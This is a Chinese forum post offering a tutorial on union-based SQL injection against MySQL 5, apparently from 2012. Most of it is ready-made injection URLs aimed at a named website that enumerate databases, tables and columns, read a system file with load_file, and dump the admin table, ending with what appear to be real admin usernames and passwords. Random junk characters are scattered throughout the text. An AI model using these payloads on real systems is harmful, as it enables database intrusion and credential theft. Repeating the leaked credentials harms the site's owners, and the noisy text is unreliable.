此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
. @# K( x$ v. g. S; E# t" I" u但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
2 `3 w) ]0 K& H& M0 b5 ^
S+ d) m, h; H3 {+ t% n. A; z9 r6 r5 ?
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入$ |6 x3 f4 R9 i
- }( x$ Q7 {/ Y$ ]) e
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
/ w1 y* Y! X. B- _
/ S9 U! j- D0 `% j1 W* f' Y下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示0 E( M5 Y; I+ s
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等) V+ T/ U: `# O! j& _* S C* z2 E
# q8 _9 _8 L, T) Whttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,176 |. \4 }- l6 L8 p( C7 x6 F. s! ^
" ~# J5 @2 u: O; ]7 @
读出所有库:
Z( i: l, h# vhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
/ R& d% P" j4 O6 l( E
9 N7 b# K" A6 {$ g, l" a
4 u( h+ x! ~. ~! O
$ B* i1 R9 Z2 {4 i# B6 o' x2 U读出所有表:2 P9 i, y( A5 n4 t4 Y) u, h" V
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()4 _3 D* p" b2 S* H3 U% x: d# k0 t L
/ A2 Q' O2 F6 _1 U; w! O读出所有表字段:
) c( H/ A' s7 d% W7 Q2 ^http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
" `8 a2 d$ E. A, F*/ (97,100,109,105,110)为admin的ascii码 依次类推
' V! G% S. T5 X1 f9 y1 f
, c0 R4 u: o4 c/ O读出所有表字段里的内容:+ J. u+ E9 v+ a: l
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
1 \% D. U. |! K! Z; c a* T* y; ?' S* X2 M0 m
/ ?4 e* r* q1 s1 y2 X" b, j
! X5 M( G) J+ E4 _: l+ ]: {
4 Y! x3 a- M: p2 J) g0 n3 u t
# c' D9 T8 }/ a5 d& K4 x2 l4 h" H) }0 [9 a; K
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23# k6 S5 M0 h0 Q& X) ~
/ Q J* a) Q& ~3 ^3 A. J
5 E1 s$ Y' t$ D. l: u: n* g* Chttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23# h$ `9 S/ h; W, ?, F3 C% ~
. }" d$ N- V h- _. Jhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
: v+ }. l! ]" \7 h9 P+ J6 w0 o3 |( p- n: Y; u4 D
% u: B* ^" N# ^7 Ehttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%230 A1 N) q, K5 Y+ x L; X& ?
) R2 ]' \) s: P# Q, V
* }5 ]2 \% @3 m/ f webmaster:dzb521123,simlab:simadmin20043233
4 S( R) _" u* P7 ~) Z C% k |
发表于 2012-9-13 16:37:34
收藏
支持
反对